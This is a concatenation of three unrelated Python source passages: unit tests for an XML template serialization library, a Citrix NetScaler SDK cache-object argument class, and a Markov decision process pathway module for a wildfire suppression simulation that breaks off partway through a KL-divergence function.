children = [xmlutil.TemplateElement('child1'),
xmlutil.TemplateElement('child2'),
xmlutil.TemplateElement('child3'), ]
# Extend the parent by those children
elem.extend(children)
# Create a test child to remove
child = xmlutil.TemplateElement('child2')
# Try to remove it
self.assertRaises(ValueError, elem.remove, child)
# Ensure that no child was removed
self.assertEqual(3, len(elem))
# Now remove a legitimate child
elem.remove(children[1])
# Ensure that the child was removed
self.assertEqual(2, len(elem))
self.assertEqual(children[0], elem[0])
self.assertEqual(children[2], elem[1])
self.assertNotIn('child2', elem)
# Ensure the child cannot be retrieved by name
def get_key(elem, key):
return elem[key]
self.assertRaises(KeyError, get_key, elem, 'child2')
def test_element_text(self):
# Create an element
elem = xmlutil.TemplateElement('test')
# Ensure that it has no text
self.assertIsNone(elem.text)
# Try setting it to a string and ensure it becomes a selector
elem.text = 'test'
self.assertTrue(hasattr(elem.text, 'chain'))
self.assertEqual(1, len(elem.text.chain))
self.assertEqual('test', elem.text.chain[0])
# Try resetting the text to None
elem.text = None
self.assertIsNone(elem.text)
# Now make up a selector and try setting the text to that
sel = xmlutil.Selector()
elem.text = sel
self.assertEqual(sel, elem.text)
# Finally, try deleting the text and see what happens
del elem.text
self.assertIsNone(elem.text)
def test_apply_attrs(self):
# Create a template element
attrs = dict(attr1=xmlutil.ConstantSelector(1),
attr2=xmlutil.ConstantSelector(2))
tmpl_elem = xmlutil.TemplateElement('test', attrib=attrs)
# Create an etree element
elem = etree.Element('test')
# Apply the template to the element
tmpl_elem.apply(elem, None)
# Now, verify the correct attributes were set
for k, v in elem.items():
self.assertEqual(str(attrs[k].value), v)
def test_apply_text(self):
# Create a template element
tmpl_elem = xmlutil.TemplateElement('test')
tmpl_elem.text = xmlutil.ConstantSelector(1)
# Create an etree element
elem = etree.Element('test')
# Apply the template to the element
tmpl_elem.apply(elem, None)
# Now, verify the text was set
self.assertEqual(str(tmpl_elem.text.value), elem.text)
def test__render(self):
attrs = dict(attr1=xmlutil.ConstantSelector(1),
attr2=xmlutil.ConstantSelector(2),
attr3=xmlutil.ConstantSelector(3))
# Create a master template element
master_elem = xmlutil.TemplateElement('test', attr1=attrs['attr1'])
# Create a couple of slave template element
slave_elems = [xmlutil.TemplateElement('test', attr2=attrs['attr2']),
xmlutil.TemplateElement('test', attr3=attrs['attr3']), ]
# Try the render
elem = master_elem._render(None, None, slave_elems, None)
# Verify the particulars of the render
self.assertEqual('test', elem.tag)
self.assertEqual(0, len(elem.nsmap))
for k, v in elem.items():
self.assertEqual(str(attrs[k].value), v)
# Create a parent for the element to be rendered
parent = etree.Element('parent')
# Try the render again...
elem = master_elem._render(parent, None, slave_elems, dict(a='foo'))
# Verify the particulars of the render
self.assertEqual(1, len(parent))
self.assertEqual(parent[0], elem)
self.assertEqual(1, len(elem.nsmap))
self.assertEqual('foo', elem.nsmap['a'])
def test_render(self):
# Create a template element
tmpl_elem = xmlutil.TemplateElement('test')
tmpl_elem.text = xmlutil.Selector()
# Create the object we're going to render
obj = ['elem1', 'elem2', 'elem3', 'elem4']
# Try a render with no object
elems = tmpl_elem.render(None, None)
self.assertEqual(0, len(elems))
# Try a render with one object
elems = tmpl_elem.render(None, 'foo')
self.assertEqual(1, len(elems))
self.assertEqual('foo', elems[0][0].text)
self.assertEqual('foo', elems[0][1])
# Now, try rendering an object with multiple entries
parent = etree.Element('parent')
elems = tmpl_elem.render(parent, obj)
self.assertEqual(4, len(elems))
# Check the results
for idx in range(len(obj)):
self.assertEqual(obj[idx], elems[idx][0].text)
self.assertEqual(obj[idx], elems[idx][1])
def test_subelement(self):
# Try the SubTemplateElement constructor
parent = xmlutil.SubTemplateElement(None, 'parent')
self.assertEqual('parent', parent.tag)
self.assertEqual(0, len(parent))
# Now try it with a parent element
child = xmlutil.SubTemplateElement(parent, 'child')
self.assertEqual('child', child.tag)
self.assertEqual(1, len(parent))
self.assertEqual(parent[0], child)
def test_wrap(self):
# These are strange methods, but they make things easier
elem = xmlutil.TemplateElement('test')
self.assertEqual(elem, elem.unwrap())
self.assertEqual(elem, elem.wrap().root)
def test_dyntag(self):
obj = ['a', 'b', 'c']
# Create a template element with a dynamic tag
tmpl_elem = xmlutil.TemplateElement(xmlutil.Selector())
# Try the render
parent = etree.Element('parent')
elems = tmpl_elem.render(parent, obj)
# Verify the particulars of the render
self.assertEqual(len(obj), len(elems))
for idx in range(len(obj)):
self.assertEqual(obj[idx], elems[idx][0].tag)
class TemplateTest(test.TestCase):
def test_wrap(self):
# These are strange methods, but they make things easier
elem = xmlutil.TemplateElement('test')
tmpl = xmlutil.Template(elem)
self.assertEqual(elem, tmpl.unwrap())
self.assertEqual(tmpl, tmpl.wrap())
def test__siblings(self):
# Set up a basic template
elem = xmlutil.TemplateElement('test')
tmpl = xmlutil.Template(elem)
# Check that we get the right siblings
siblings = tmpl._siblings()
self.assertEqual(1, len(siblings))
self.assertEqual(elem, siblings[0])
def test__splitTagName(self):
test_cases = [
('a', ['a']),
('a:b', ['a', 'b']),
('{http://test.com}a:b', ['{http://test.com}a', 'b']),
('a:b{http://test.com}:c', ['a', 'b{http://test.com}', 'c']),
]
for test_case, expected in test_cases:
result = xmlutil.TemplateElement._splitTagName(test_case)
self.assertEqual(expected, result)
def test__nsmap(self):
# Set up a basic template
elem = xmlutil.TemplateElement('test')
tmpl = xmlutil.Template(elem, nsmap=dict(a="foo"))
# Check out that we get the right namespace dictionary
nsmap = tmpl._nsmap()
self.assertNotEqual(id(nsmap), id(tmpl.nsmap))
self.assertEqual(1, len(nsmap))
self.assertEqual('foo', nsmap['a'])
def test_master_attach(self):
# Set up a master template
elem = xmlutil.TemplateElement('test')
tmpl = xmlutil.MasterTemplate(elem, 1)
# Make sure it has a root but no slaves
self.assertEqual(elem, tmpl.root)
self.assertEqual(0, len(tmpl.slaves))
# Try to attach an invalid slave
bad_elem = xmlutil.TemplateElement('test2')
self.assertRaises(ValueError, tmpl.attach, bad_elem)
self.assertEqual(0, len(tmpl.slaves))
# Try to attach an invalid and a valid slave
good_elem = xmlutil.TemplateElement('test')
self.assertRaises(ValueError, tmpl.attach, good_elem, bad_elem)
self.assertEqual(0, len(tmpl.slaves))
# Try to attach an inapplicable template
class InapplicableTemplate(xmlutil.Template):
def apply(self, master):
return False
inapp_tmpl = InapplicableTemplate(good_elem)
tmpl.attach(inapp_tmpl)
self.assertEqual(0, len(tmpl.slaves))
# Now try attaching an applicable template
tmpl.attach(good_elem)
self.assertEqual(1, len(tmpl.slaves))
self.assertEqual(good_elem, tmpl.slaves[0].root)
def test_master_copy(self):
# Construct a master template
elem = xmlutil.TemplateElement('test')
tmpl = xmlutil.MasterTemplate(elem, 1, nsmap=dict(a='foo'))
# Give it a slave
slave = xmlutil.TemplateElement('test')
tmpl.attach(slave)
# Construct a copy
copy = tmpl.copy()
# Check to see if we actually managed a copy
self.assertNotEqual(tmpl, copy)
self.assertEqual(tmpl.root, copy.root)
self.assertEqual(tmpl.version, copy.version)
self.assertEqual(id(tmpl.nsmap), id(copy.nsmap))
self.assertNotEqual(id(tmpl.slaves), id(copy.slaves))
self.assertEqual(len(tmpl.slaves), len(copy.slaves))
self.assertEqual(tmpl.slaves[0], copy.slaves[0])
def test_slave_apply(self):
# Construct a master template
elem = xmlutil.TemplateElement('test')
master = xmlutil.MasterTemplate(elem, 3)
# Construct a slave template with applicable minimum version
slave = xmlutil.SlaveTemplate(elem, 2)
self.assertTrue(slave.apply(master))
# Construct a slave template with equal minimum version
slave = xmlutil.SlaveTemplate(elem, 3)
self.assertTrue(slave.apply(master))
# Construct a slave template with inapplicable minimum version
slave = xmlutil.SlaveTemplate(elem, 4)
self.assertFalse(slave.apply(master))
# Construct a slave template with applicable version range
slave = xmlutil.SlaveTemplate(elem, 2, 4)
self.assertTrue(slave.apply(master))
# Construct a slave template with low version range
slave = xmlutil.SlaveTemplate(elem, 1, 2)
self.assertFalse(slave.apply(master))
# Construct a slave template with high version range
slave = xmlutil.SlaveTemplate(elem, 4, 5)
self.assertFalse(slave.apply(master))
# Construct a slave template with matching version range
slave = xmlutil.SlaveTemplate(elem, 3, 3)
self.assertTrue(slave.apply(master))
def test__serialize(self):
# Our test object to serialize
obj = {'test': {'name': 'foobar',
'values': [1, 2, 3, 4],
'attrs': {'a': 1,
'b': 2,
'c': 3,
'd': 4, },
'image': {'name': 'image_foobar', 'id': 42, }, }, }
# Set up our master template
root = xmlutil.TemplateElement('test', selector='test',
name='name')
value = xmlutil.SubTemplateElement(root, 'value', selector='values')
value.text = xmlutil.Selector()
attrs = xmlutil.SubTemplateElement(root, 'attrs', selector='attrs')
xmlutil.SubTemplateElement(attrs, 'attr', selector=xmlutil.get_items,
key=0, value=1)
master = xmlutil.MasterTemplate(root, 1, nsmap=dict(f='foo'))
# Set up our slave template
root_slave = xmlutil.TemplateElement('test', selector='test')
image = xmlutil.SubTemplateElement(root_slave, 'image',
selector='image', id='id')
image.text = xmlutil.Selector('name')
slave = xmlutil.SlaveTemplate(root_slave, 1, nsmap=dict(b='bar'))
# Attach the slave to the master...
master.attach(slave)
# Try serializing our object
siblings = master._siblings()
nsmap = master._nsmap()
result = master._serialize(None, obj, siblings, nsmap)
# Now we get to manually walk the element tree...
self.assertEqual('test', result.tag)
self.assertEqual(2, len(result.nsmap))
self.assertEqual('foo', result.nsmap['f'])
self.assertEqual('bar', result.nsmap['b'])
self.assertEqual(result.get('name'), obj['test']['name'])
for idx, val in enumerate(obj['test']['values']):
self.assertEqual('value', result[idx].tag)
self.assertEqual(str(val), result[idx].text)
idx += 1
self.assertEqual('attrs', result[idx].tag)
for attr in result[idx]:
self.assertEqual('attr', attr.tag)
self.assertEqual(str(obj['test']['attrs'][attr.get('key')]),
attr.get('value'))
idx += 1
self.assertEqual('image', result[idx].tag)
self.assertEqual(str(obj['test']['image']['id']),
result[idx].get('id'))
self.assertEqual(obj['test']['image']['name'], result[idx].text)
def test_serialize_with_delimiter(self):
# Our test object to serialize
obj = {'test': {'scope0:key1': 'Value1',
'scope0:scope1:key2': 'Value2',
'scope0:scope1:scope2:key3': 'Value3'
}}
# Set up our master template
root = xmlutil.TemplateElement('test', selector='test')
key1 = xmlutil.SubTemplateElement(root, 'scope0:key1',
selector='scope0:key1')
key1.text = xmlutil.Selector()
key2 = xmlutil.SubTemplateElement(root, 'scope0:scope1:key2',
selector='scope0:scope1:key2')
key2.text = xmlutil.Selector()
key3 = xmlutil.SubTemplateElement(root, 'scope0:scope1:scope2:key3',
selector='scope0:scope1:scope2:key3')
key3.text = xmlutil.Selector()
serializer = xmlutil.MasterTemplate(root, 1)
xml_list = []
xml_list.append("<?xmlversion='1.0'encoding='UTF-8'?><test>")
xml_list.append("<scope0><key1>Value1</key1><scope1>")
xml_list.append("<key2>Value2</key2><scope2><key3>Value3</key3>")
xml_list.append("</scope2></scope1></scope0></test>")
expected_xml = ''.join(xml_list)
result = serializer.serialize(obj)
result = result.replace('\n', '').replace(' ', '')
self.assertEqual(expected_xml, result)
class MasterTemplateBuilder(xmlutil.TemplateBuilder):
def construct(self):
elem = xmlutil.TemplateElement('test')
return xmlutil.MasterTemplate(elem, 1)
class SlaveTemplateBuilder(xmlutil.TemplateBuilder):
def construct(self):
elem = xmlutil.TemplateElement('test')
return xmlutil.SlaveTemplate(elem, 1)
class TemplateBuilderTest(test.TestCase):
def test_master_template_builder(self):
# Make sure the template hasn't been built yet
self.assertIsNone(MasterTemplateBuilder._tmpl)
# Now, construct the template
tmpl1 = MasterTemplateBuilder()
# Make sure that there is a template cached...
self.assertIsNotNone(MasterTemplateBuilder._tmpl)
# Make sure it wasn't what was returned...
self.assertNotEqual(MasterTemplateBuilder._tmpl, tmpl1)
# Make sure it doesn't get rebuilt
cached = MasterTemplateBuilder._tmpl
tmpl2 = MasterTemplateBuilder()
self.assertEqual(MasterTemplateBuilder._tmpl, cached)
# Make sure we're always getting fresh copies
self.assertNotEqual(tmpl1, tmpl2)
# Make sure we can override the copying behavior
tmpl3 = MasterTemplateBuilder(False)
self.assertEqual(MasterTemplateBuilder._tmpl, tmpl3)
def test_slave_template_builder(self):
# Make sure the template hasn't been built yet
self.assertIsNone(SlaveTemplateBuilder._tmpl)
# Now, construct the template
tmpl1 = SlaveTemplateBuilder()
# Make sure there is a template cached...
self.assertIsNotNone(SlaveTemplateBuilder._tmpl)
# Make sure it was what was returned...
self.assertEqual(SlaveTemplateBuilder._tmpl, tmpl1)
# Make sure it doesn't get rebuilt
tmpl2 = SlaveTemplateBuilder()
self.assertEqual(SlaveTemplateBuilder._tmpl, tmpl1)
# Make sure we're always getting the cached copy
self.assertEqual(tmpl1, tmpl2)
class MiscellaneousXMLUtilTests(test.TestCase):
def test_make_flat_dict(self):
expected_xml = ("<?xml version='1.0' encoding='UTF-8'?>\n"
'<wrapper><a>foo</a><b>bar</b></wrapper>')
root = xmlutil.make_flat_dict('wrapper')
tmpl = xmlutil.MasterTemplate(root, 1)
result = tmpl.serialize(dict(wrapper=dict(a='foo', b='bar')))
self.assertEqual(expected_xml, result)
| |
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class cacheobject_args :
""" Provides additional arguments required for fetching the cacheobject resource.
"""
def __init__(self) :
self._url = ""
self._locator = 0
self._httpstatus = 0
self._host = ""
self._port = 0
self._groupname = ""
self._httpmethod = ""
self._group = ""
self._ignoremarkerobjects = ""
self._includenotreadyobjects = ""
@property
def url(self) :
"""URL of the particular object whose details is required. Parameter "host" must be specified along with the URL.<br/>Minimum length = 1.
"""
try :
return self._url
except Exception as e:
raise e
@url.setter
def url(self, url) :
"""URL of the particular object whose details is required. Parameter "host" must be specified along with the URL.<br/>Minimum length = 1
"""
try :
self._url = url
except Exception as e:
raise e
@property
def locator(self) :
"""ID of the cached object.
"""
try :
return self._locator
except Exception as e:
raise e
@locator.setter
def locator(self, locator) :
"""ID of the cached object.
"""
try :
self._locator = locator
except Exception as e:
raise e
@property
def httpstatus(self) :
"""HTTP status of the object.
"""
try :
return self._httpstatus
except Exception as e:
raise e
@httpstatus.setter
def httpstatus(self, httpstatus) :
"""HTTP status of the object.
"""
try :
self._httpstatus = httpstatus
except Exception as e:
raise e
@property
def host(self) :
"""Host name of the object. Parameter "url" must be specified.<br/>Minimum length = 1.
"""
try :
return self._host
except Exception as e:
raise e
@host.setter
def host(self, host) :
"""Host name of the object. Parameter "url" must be specified.<br/>Minimum length = 1
"""
try :
self._host = host
except Exception as e:
raise e
@property
def port(self) :
"""Host port of the object. You must also set the Host parameter.<br/>Default value: 80<br/>Minimum value = 1.
"""
try :
return self._port
except Exception as e:
raise e
@port.setter
def port(self, port) :
"""Host port of the object. You must also set the Host parameter.<br/>Default value: 80<br/>Minimum value = 1
"""
try :
self._port = port
except Exception as e:
raise e
@property
def groupname(self) :
"""Name of the content group to which the object belongs. It will display only the objects belonging to the specified content group. You must also set the Host parameter.
"""
try :
return self._groupname
except Exception as e:
raise e
@groupname.setter
def groupname(self, groupname) :
"""Name of the content group to which the object belongs. It will display only the objects belonging to the specified content group. You must also set the Host parameter.
"""
try :
self._groupname = groupname
except Exception as e:
raise e
@property
def httpmethod(self) :
"""HTTP request method that caused the object to be stored.<br/>Default value: GET<br/>Possible values = GET, POST.
"""
try :
return self._httpmethod
except Exception as e:
raise e
@httpmethod.setter
def httpmethod(self, httpmethod) :
"""HTTP request method that caused the object to be stored.<br/>Default value: GET<br/>Possible values = GET, POST
"""
try :
self._httpmethod = httpmethod
except Exception as e:
raise e
@property
def group(self) :
"""Name of the content group whose objects should be listed.
"""
try :
return self._group
except Exception as e:
raise e
@group.setter
def group(self, group) :
"""Name of the content group whose objects should be listed.
"""
try :
self._group = group
except Exception as e:
raise e
@property
def ignoremarkerobjects(self) :
"""Ignore marker objects. Marker objects are created when a response exceeds the maximum or minimum response size for the content group or has not yet received the minimum number of hits for the content group.<br/>Possible values = ON, OFF.
"""
try :
return self._ignoremarkerobjects
except Exception as e:
raise e
@ignoremarkerobjects.setter
def ignoremarkerobjects(self, ignoremarkerobjects) :
"""Ignore marker objects. Marker objects are created when a response exceeds the maximum or minimum response size for the content group or has not yet received the minimum number of hits for the content group.<br/>Possible values = ON, OFF
"""
try :
self._ignoremarkerobjects = ignoremarkerobjects
except Exception as e:
raise e
@property
def includenotreadyobjects(self) :
"""Include responses that have not yet reached a minimum number of hits before being cached.<br/>Possible values = ON, OFF.
"""
try :
return self._includenotreadyobjects
except Exception as e:
raise e
@includenotreadyobjects.setter
def includenotreadyobjects(self, includenotreadyobjects) :
"""Include responses that have not yet reached a minimum number of hits before being cached.<br/>Possible values = ON, OFF
"""
try :
self._includenotreadyobjects = includenotreadyobjects
except Exception as e:
raise e
class Includenotreadyobjects:
ON = "ON"
OFF = "OFF"
class Httpmethod:
GET = "GET"
POST = "POST"
class Ignoremarkerobjects:
ON = "ON"
OFF = "OFF"
| |
"""
Generic MDP Pathway Module
"""
import numpy, math, scipy.stats
class MDP_Pathway:
def __init__(self, policy_length):
self.policy_length = policy_length
self.events = []
self.metadata = {}
self.ID_number = 0
#information on the policy which was used when this pathway was generated
#setting initial values to 1. This will mean that, unless they are explicitly set,
# J3 weights will be equal to J1 weights.
self.generation_policy_parameters = [1.0] * policy_length
self.generation_joint_prob = 1.0
#other cumulative measures
self.actions_0_taken = 0
self.actions_1_taken = 0
#normalization values, in case original values ever want to be re-calculated
self.normalized = False
self.normalization_mags = []
self.normalization_means = []
#normalization values for net_value
self.normalized_value = False
self.normalized_value_mag = 0.0
self.normalized_value_mean = 0.0
self.discount_rate = 1.0
#to hold the sum of all of this pathway's discounted values
self.net_value = 0.0
def set_generation_policy_parameters(self,parameter_list, UPDATE_JOINT_PROB=False):
self.generation_policy_parameters = parameter_list
#calculate the joint probability (assuming there are any MDP_Event objects in the list)
pol = MDP_Policy(self.policy_length)
if UPDATE_JOINT_PROB:
joint_p = 1.0
for ev in self.events:
joint_p *= pol.calc_action_prob(ev)
self.generation_joint_prob = joint_p
def update_net_value(self):
"""Sums the rewards from every event and records the value in self.net_value"""
value = 0
for ev in self.events:
value += sum(ev.rewards) * pow(self.discount_rate, ev.sequence_index)
self.net_value = value
def strip_metadata(self):
self.metadata = None
class MDP_Event:
def __init__(self,sequence_index):
"""Instantiation
Arguements:
sequence_index: integer: refers to the step in the MDP in which this event took place. It is
used to compute the discount to apply to this event, according to this pathway's discount rate.
"""
self.sequence_index = sequence_index
self.state_length = 0
self.state = []
self.action = False
self.action_prob = 0.5 #probability of taking this action
self.decision_prob = 0.5 #probability of doing what we did
self.rewards = []
self.metadata = {}
def set_states(self, state_list):
self.state = convert_to_array(state_list)
self.state_length = len(self.state)
def set_actions(self, action):
self.action = action
def set_action_probabilities(self, action_prob):
self.action_probs = action_prob
def set_rewards(self, reward_list):
self.rewards = convert_to_array(reward_list)
def set_meta_data(self, meta_data_dictionary):
self.metadata = meta_data_dictionary
class MDP_Policy:
def __init__(self, policy_length):
#TODO unlock multiple actions
# a list of this policy's parameters.
self.b = [0]*policy_length
#Because the logistic function can easily produce 0-values for very low probabilities,
# we need to set a limit for what the lowest probability allowed is. Otherwise
# the product of any series of events is likely to be 0, because of even one very low probability
self.probability_lower_limit = 0.001
#likewise, since a choice that DOES NOT follow a rule when the probability is 1 will also produce
# and effective probability of 0, there needs to be an upper limit as well.
self.probability_upper_limit = 0.999
def set_params(self, parameter_list):
"""this function takes a new list of parameters for the policy"""
#TODO unlock multiple actions
self.b = parameter_list[:]
def get_params(self):
#TODO unlock multiple actions
return self.b
def cross_product(self, feature_list):
"""Return the crossproduct between each feature and it's corresponding parameter beta value"""
#TODO unlock multiple actions (multple cross products? or else which crossproduct?)
cp = 0.0
for i in range(len(feature_list)):
cp += feature_list[i] * self.b[i]
return cp
def calc_prob(self, feature_list):
"""Calculates the probabilty of making a decision given a set of features"""
#TODO unlock multiple actions
cp = self.cross_product(feature_list)
try:
p = logistic(cp)
#enforce lower limit on probabilities...
if p < self.probability_lower_limit:
p = self.probability_lower_limit
#enforce upper limit on probabilities...
if p > self.probability_upper_limit:
p = self.probability_upper_limit
return p
except(OverflowError):
print("FGPolicy.calcProb() encountered and overflow error:")
print(" crossproduct is: " + str(cp))
return 0.0
def calc_action_prob(self, MDP_event):
"""Returns the probability of taking the action this event took, if it had been under this policy.
"""
#TODO unlock multiple actions
p_pol = self.calc_prob(MDP_event.state)
p_actual = 0.0
if MDP_event.action:
#this decision is set to True, i.e., the action was taken
p_actual = p_pol
else:
#this decision is set to False, i.e., the action was not taken
p_actual = 1.0 - p_pol
return p_actual
#################################################################
# MODULE-LEVEL FUNCTIONS
#################################################################
def convert_to_array(numeric_list):
#check to see if using int's is a good idea. If the values are in between +/- 10, maybe use floats
USE_FLOAT = False
for i in numeric_list:
if (i < 10) and (i > -10):
USE_FLOAT = True
break
arr = None
if USE_FLOAT:
arr = numpy.array(numeric_list, "float16")
else:
arr = numpy.array(numeric_list, "int16")
return arr
def convert_SWIMM_pathway_to_MDP_pathway(SWIMM_pathway):
""" Converts a SWIMM pathway into a generic MDP_Pathway object and returns it"""
#create a new MDP pathway object, with policy length = 2
new_MDP_pw = MDP_Pathway(2)
new_MDP_pw.ID_number = SWIMM_pathway["ID Number"]
new_MDP_pw.net_value = SWIMM_pathway["Total Pathway Value"]
new_MDP_pw.actions_1_taken = SWIMM_pathway["Suppressions"]
new_MDP_pw.actions_0_taken = SWIMM_pathway["Timesteps"] - SWIMM_pathway["Suppressions"]
new_MDP_pw.generation_joint_prob = SWIMM_pathway["Joint Probability"]
new_MDP_pw.set_generation_policy_parameters(SWIMM_pathway["Generation Policy"][:])
for i in range(len(SWIMM_pathway["States"])):
event = MDP_Event(i)
#in SWIMM, the states are each in the following format:
#states[i] = [ev, choice, choice_prob, policy_value, this_state_value, i]
event.state_length = 2
event.state = [1, SWIMM_pathway["States"][i][0]]
event.action = SWIMM_pathway["States"][i][1]
event.decision_prob = SWIMM_pathway["States"][i][2]
event.action_prob = SWIMM_pathway["States"][i][3]
event.rewards = [SWIMM_pathway["States"][i][4]]
new_MDP_pw.events.append(event)
return new_MDP_pw
def convert_firegirl_pathway_to_MDP_pathway(firegirlpathway):
"""Converts a FireGirlPathway object to the generic MDP_Pathway object and returns it
"""
#create new MDP_Pathway with the appropriate policy length
fg_pol_len = len(firegirlpathway.Policy.b)
new_MDP_pw = MDP_Pathway(fg_pol_len)
#setting other values
new_MDP_pw.policy_length = fg_pol_len
new_MDP_pw.ID_number = firegirlpathway.ID_number
new_MDP_pw.net_value = firegirlpathway.net_value
for i in range(len(firegirlpathway.ignition_events)):
#create a new MDP_Event and populate it based on the FireGirlIgnitionRecord
event = MDP_Event(i)
event.sequence_index = i
event.state_length = fg_pol_len
event.state = firegirlpathway.ignition_events[i].features[:]
event.action = firegirlpathway.ignition_events[i].policy_choice
event.action_prob = firegirlpathway.ignition_events[i].policy_prob
if event.action:
event.decision_prob = event.action_prob
new_MDP_pw.actions_1_taken += 1
else:
event.decision_prob = 1 - event.action_prob
new_MDP_pw.actions_0_taken += 1
#and add (well, multiply) this to the joint probability
new_MDP_pw.generation_joint_prob *= event.decision_prob
event.rewards = [-1* firegirlpathway.yearly_suppression_costs[i],
firegirlpathway.yearly_logging_totals[i]
]
#setting metadata for everything else
event.metadata["Growth Total"] = firegirlpathway.yearly_growth_totals[i]
event.metadata["Location X"] = firegirlpathway.ignition_events[i].location[0]
event.metadata["Location Y"] = firegirlpathway.ignition_events[i].location[1]
event.metadata["Year"] = firegirlpathway.ignition_events[i].year
event.metadata["Timber Loss"] = firegirlpathway.ignition_events[i].outcomes[0]
event.metadata["Cells Burned"] = firegirlpathway.ignition_events[i].outcomes[1]
#event.metadata["Suppression Cost"] = firegirlpathway.ignition_events[i].outcomes[2] #already in the rewards list
event.metadata["Burn Time"] = firegirlpathway.ignition_events[i].outcomes[3]
#add the new MDP_event to the list
new_MDP_pw.events.append(event)
#done converting all FireGirlIgnitionRecord objects to MDP_Event objects
#now that events are built, fill in the generation policy stuff
#this will set MDP_Pathway.generation_policy_parameters and
# MDP_Pathway.generation_joint_prob
new_MDP_pw.set_generation_policy_parameters(firegirlpathway.Policy.b[:], UPDATE_JOINT_PROB=True)
#setting selected metadata
new_MDP_pw.metadata["Width"] = firegirlpathway.width
new_MDP_pw.metadata["Height"] = firegirlpathway.height
#new_MDP_pw.metadata["Window NW"] = firegirlpathway.window_NW
#new_MDP_pw.metadata["Window SE"] = firegirlpathway.window_SE
#new_MDP_pw.metadata["Temperature - Summer High"] = firegirlpathway.temp_summer_high
#new_MDP_pw.metadata["Temperature - Winter Low"] = firegirlpathway.temp_winter_low
#new_MDP_pw.metadata["Temperature - Variance"] = firegirlpathway.temp_var
#new_MDP_pw.metadata["Wind - Mean"] = firegirlpathway.wind_mean
#new_MDP_pw.metadata["Fire - Input Scale"] = firegirlpathway.fire_param_inputscale
#new_MDP_pw.metadata["Fire - Output Scale"] = firegirlpathway.fire_param_outputscale
#new_MDP_pw.metadata["Fire - Zero-Adjust"] = firegirlpathway.fire_param_zeroadjust
#new_MDP_pw.metadata["Fire - Smoothness"] = firegirlpathway.fire_param_smoothness
new_MDP_pw.metadata["Fire - Reach"] = firegirlpathway.fire_param_reach
#new_MDP_pw.metadata["Spread - Minimum Wind Plus Temperature"] = firegirlpathway.min_spread_windtemp
#new_MDP_pw.metadata["Spread - Minimum Fuel"] = firegirlpathway.min_spread_fuel
#new_MDP_pw.metadata["Crownfire - Input Scale"] = firegirlpathway.crownfire_param_inputscale
#new_MDP_pw.metadata["Crownfire - Output Scale"] = firegirlpathway.crownfire_param_outputscale
#new_MDP_pw.metadata["Crownfire - Zero-Adjust"] = firegirlpathway.crownfire_param_zeroadjust
#new_MDP_pw.metadata["Crownfire - Smoothness"] = firegirlpathway.crownfire_param_smoothness1
new_MDP_pw.metadata["Fire - Average End Day"] = firegirlpathway.fire_average_end_day
new_MDP_pw.metadata["Suppression - Effect Percent"] = firegirlpathway.fire_suppression_rate
new_MDP_pw.metadata["Suppression - Cost Per Cell"] = firegirlpathway.fire_suppression_cost_per_cell
new_MDP_pw.metadata["Suppression - Cost Per Day"] = firegirlpathway.fire_suppression_cost_per_day
#new_MDP_pw.metadata["Growth - Timber Constant"] = firegirlpathway.growth_timber_constant
new_MDP_pw.metadata["Growth - Fuel Accumulation"] = firegirlpathway.growth_fuel_accumulation
new_MDP_pw.metadata["Growth - Model Number"] = firegirlpathway.using_growth_model
new_MDP_pw.metadata["Logging - Block Width"] = firegirlpathway.logging_block_width
new_MDP_pw.metadata["Logging - Minimum Timber Value"] = firegirlpathway.logging_min_value
new_MDP_pw.metadata["Logging - Slash Remaining"] = firegirlpathway.logging_slash_remaining
new_MDP_pw.metadata["Logging - Percent of Increment"] = firegirlpathway.logging_percentOfIncrement
new_MDP_pw.metadata["Logging - Max Cuts"] = firegirlpathway.logging_max_cuts
return new_MDP_pw
def logistic(value):
#This function calculates the simple logistic function value of the input
try:
#TODO check for overflow conditions to help save time, instead of casting exceptions
return ( 1.0 / (1.0 + math.exp(-value)) )
except(OverflowError):
#print("FireGirlPolicy.logistic() encountered and overflow error: returning 0")
#an overflow error can only happen when value is very negative, resulting in too
# high a exp() value. In turn, this means the division goes to zero, as expected
# for a logistic function.
return 0.0
def crossproduct(vector1, vector2):
"""Returns the crossproduct of two vectors"""
if not len(vector1) == len(vector2):
print("Error in MDP.crossproduct(v1, v2)... vectors are not of equal length.")
return None
else:
total = 0
for i in range(len(vector1)):
total += vector1[i] * vector2[i]
return total
def KLD(pathways, new_pol):
"""
Calculates the Kullback-Leibler divergence of the new policy "new_pol" from the true policy
which is assumed to be the policy that generated each MDP pathway in the "pathways" list.
NOTE: For the moment, mine's coming out different (occasionally negative) than scipy's, so I'm just
using scipy's for now.
ARGUEMENTS:
pathways: a list of MDP.Pathway objects
new_pol: a list containing the parameters of the policy under question
EXPLANATION:
The KL Divergence is calculated as:
KLD = SUM_p( SUM_i( P(i) * ln(P(i)/Q(i)) ) )
where "p" is the number of pathways, and "i" is the number of events in pathway "p"
and P(i) is the decision probability of event "i" under the true distribution (in this case, the one
that was used in the generation of pathway[i], (techically each policy for each pathway should
all be the same...)) In other words, the probability that this new policy making the decision
that was made vs the probability under the original simulation
and Q(i) is the action probability under the new polciy for that same event
From what I have been able to find out, the sums of Q(i) and P(i) should both be one for this to work.
The calculation is also implemented by scipy.stats.entropy(pk, qk=None, base=None), which automatically
normalizes the sums to one.
"""
#construct a single array of all events from all pathways
#find out how many events there are:
event_count = 0
for pw in pathways:
event_count += len(pw.events)
pk = [None] * event_count
qk = [None] * event_count
#fill the 1-D arrays, and grab the sums over p and q for the normalization step
pk_sum = 0
qk_sum = 0
i = -1 #the first assignment starts by incrementing i, so it will actually begin at i=0
for pw in pathways:
for e in pw.events:
i+=1
pk[i] = e.action_prob
qk[i] = logistic( crossproduct(new_pol, e.state ) )
#pk_sum += pk[i]
#qk_sum += qk[i]
#now sum up the KL Divergence, doing the division(normalization-to-1) step in the process
#KLD = 0.0
#for j in range(event_count):
# pk[i] = pk[i] / pk_sum
# qk[i] = qk[i] / qk_sum
# KLD += pk[i] * math.log( pk[i] / qk[i] )
#alternatively: (is there any difference?)
# KLD += (pk[i]/pk_sum) * math.log( (pk[i]/pk_sum) / (qk[i]/qk_sum) )
#compute it with scipi for a comparison
KLD_scipy = scipy.stats.entropy(pk,qk)
#print("")
